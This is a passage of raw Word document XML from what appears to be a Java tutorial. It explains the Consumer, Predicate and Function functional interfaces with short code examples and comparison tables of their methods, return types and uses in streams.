          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Performs an operation on an object of type T (no return value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C02778" w14:textId="50C21B93" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7D66" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>void accept(T t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6E6E1" w14:textId="41A8B7E2" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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ase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7D66" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logging, printing, updating, applying changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0BE9E" w14:textId="77777777" w:rsidR="00062DC3" w:rsidRPr="00CE4B95" w:rsidRDefault="00062DC3" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C4401A" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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lastRenderedPageBreak/>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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41512736" w14:textId="77777777" w:rsidR="00832AA2" w:rsidRPr="00CE4B95" w:rsidRDefault="00832A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3698212"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumer</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printUpp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UpperCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A16AF" w14:textId="77777777" w:rsidR="00832AA2" w:rsidRPr="00CE4B95" w:rsidRDefault="00832A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3698212"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B46C28" w14:textId="0EA4B09D" w:rsidR="00832AA2" w:rsidRPr="00CE4B95" w:rsidRDefault="00832A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3698212"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printUpp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ccep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ell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 HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618874E" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E02D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9EE95A6">
          <v:rect id="_x0000_i1750" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BC103" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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Real-World Use in Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAF82A" w14:textId="77777777" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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4826"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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name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Joh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Sa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Jennif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Joe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF463C" w14:textId="77777777" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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4826"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C66A0C" w14:textId="77777777" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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4826"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Predicate to filter names longer than 3 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF511D" w14:textId="77777777" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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4826"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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p>
    <w:p w14:paraId="403777AA" w14:textId="77777777" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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482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il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edicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D035532" w14:textId="322CD9F6" w:rsidR="006014DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00601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482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orEac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onsumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C084D3" w14:textId="4D8B153F" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4320560B" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D02">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14"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="1177"/>
        <w:gridCol w:w="1894"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w14:paraId="48EBB8AC" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A91A961" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00B07F6A">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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="511BCFB8" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00B07F6A">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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32FCABBF" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00B07F6A">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Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2255996D" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00B07F6A">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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w14:paraId="114C0862" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="161882AB" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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edicate&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="455987FA" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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est(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16C261F5" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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oolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A34A934" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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valuate a condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w14:paraId="38CF96D0" w14:textId="77777777" w:rsidTr="00E02D02">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CEA5EEF" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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sumer&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3648CDAB" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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ccept(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2206E09B" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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oid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE358B8" w14:textId="77777777" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00E02D02" w:rsidP="00E02D0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erform an action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BE7826C" w14:textId="66E99532" w:rsidR="00E02D02" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E02D0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B7732EE">
          <v:rect id="_x0000_i1751" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1E91B" w14:textId="77777777" w:rsidR="00E94AED" w:rsidRPr="00CE4B95" w:rsidRDefault="00E94AED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="_Toc196307720"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Predicate and Function?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="1FD353AD" w14:textId="5938EB7E" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0173FD" w14:textId="206084E7" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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68"/>
        <w:gridCol w:w="3736"/>
        <w:gridCol w:w="3710"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="306F9A62" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BCB825B" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097F">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4954C7E8" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097F">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redicate&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5485EA05" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097F">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unction&lt;T, R&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="2B64AD95" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44826FE7" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0BC3A3" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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presents a condition (true/false check)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D5D326F" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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presents a transformation or mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="6D66C6EC" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5063FE47" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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ethod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="271EB8C5" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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oolean test(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A32246" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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 apply(T t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="6F77568F" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AEA305E" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="254E3787" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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oolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B5046B" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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ny type R (generic return type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="5923A48B" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5040960C" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58C92BFD" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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ltering, validations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38A97CC0" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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verting or transforming data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D097F" w:rsidRPr="00CE4B95" w14:paraId="37CE114A" w14:textId="77777777" w:rsidTr="001D097F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476C5DAF" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2352DFB6" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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lter() in streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D5D1A7D" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097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p() in streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="238DEB7A" w14:textId="77777777" w:rsidR="001D097F" w:rsidRPr="00CE4B95" w:rsidRDefault="001D097F" w:rsidP="001D097F">
      <w:pPr>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Predicate Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24301E36" w14:textId="77777777" w:rsidR="00AD4B5F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD4B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112851"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Predicate</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isLong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st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p>
    <w:p w14:paraId="6503BD4E" w14:textId="77777777" w:rsidR="00AD4B5F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD4B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112851"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82424F" w14:textId="77777777" w:rsidR="00AD4B5F" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD4B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112851"/>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Lo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es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ell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false</w:t>
